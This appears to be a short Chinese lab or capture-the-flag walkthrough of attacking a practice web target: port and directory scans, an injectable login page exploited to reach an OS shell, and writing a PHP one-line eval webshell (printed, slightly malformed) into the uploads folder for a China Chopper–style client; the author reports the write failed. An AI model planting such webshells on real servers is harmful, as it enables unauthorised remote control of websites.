第一步访问靶场
扫描端口
扫描目录
访问txt
然后继续扫描这些目录
看看有什么,是个phpinfo没啥用
扫777的时候扫到点东西,看一看
css文件和js文件看不懂那就只能是登录界面了
发现页面有报错回显
抓个包跑一下
跑出了payload 那么继续
链接osshell地址我们选择之前info.php文件里查到的网站根目录加上uploads的路径
因为uploads路径肯定能存放文件
然后写一个一句话木马
echo "<?php @eval($_POST[cmd];?)>" > 10.php
然后用菜刀或者什么的链接即可,不过小编这里一句话木马写不进去,还没有找出原因,如果有大佬有想法可以评论区告诉我